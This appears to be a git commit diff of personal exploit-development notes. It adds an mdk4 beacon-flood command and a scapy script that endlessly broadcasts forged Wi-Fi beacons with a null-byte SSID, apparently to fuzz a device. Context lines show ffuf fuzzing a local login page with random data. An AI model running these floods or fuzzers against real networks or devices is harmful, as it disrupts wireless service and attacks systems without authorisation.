added stuff with scapy and mdk4 for wifi beacon exploit dev

This commit is contained in:
2024-09-23 22:29:50 -06:00
parent fcaa1edab5
commit 16d380b782
15 changed files with 21125 additions and 16 deletions
+18 -1
View File
@@ -349,4 +349,21 @@ filename="/home/kali/marauderexploitdev/imgs/${number}-${tag}-${dumpsize}-${time
echo "sudo dd if=$block of=$filename bs=$blocksize count=$blocks status=progress conv=fdatasync"
ffuf -input-cmd 'dd bs=1 count=1K if=/dev/urandom' -u "http://10.0.0.80/get.php?email=FUZZ&password=FUZZ" -input-num 2000 -mc all -timeout 3 -v -ignore-body -sa -t 256 -rate 10
ffuf -input-cmd 'dd bs=1 count=1K if=/dev/urandom' -u "http://10.0.0.80/get.php?email=FUZZ&password=FUZZ" -input-num 2000 -mc all -timeout 3 -v -ignore-body -sa -t 256 -rate 10
# beacons
sudo mdk4 wlan1 b -a -w tawn -c 1 -s 50
scapy:
SSID = b"Test\x00SSID"
iface = 'wlan1'
sender = 'ac:cb:12:ad:58:27'
dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', addr2=sender, addr3=sender)
beacon = Dot11Beacon()
essid = Dot11Elt(ID='SSID',info=SSID, len=len(SSID))
frame = RadioTap()/dot11/beacon/essid
sendp(frame, iface=iface, inter=0.100, loop=1)